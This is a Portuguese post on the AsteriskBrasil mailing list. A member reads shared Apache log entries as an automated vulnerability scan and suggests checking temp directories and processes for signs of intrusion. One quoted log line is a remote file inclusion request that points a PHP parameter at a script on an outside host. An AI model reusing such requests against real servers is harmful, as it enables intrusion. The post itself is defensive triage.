>> 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs >> HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" >> 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET >> /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" >> 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Na verdade na verdade esses logs só mostram um robozinho de scanner de vulnerabilidades. Esses logs só mostram os caras procurando furo, porém, não tem. Encontrei entradas iguais nos logs dos meus servers, mas é só isso mesmo, algum manezão investigando tua máquina. Nesse caso, claro. Procure por aquivos estranhos no /tmp no /var/tmp, procure por processos estranhos no caso de uma invasão. No caso das ligações pra itália que você falou, eles ligaram autenticados ou anonimos? -- Abraço, Alejandro Flores http://www.triforsec.com.br/ _______________________________________________ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br _______________________________________________ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br ______________________________________________ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil ______________________________________________ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
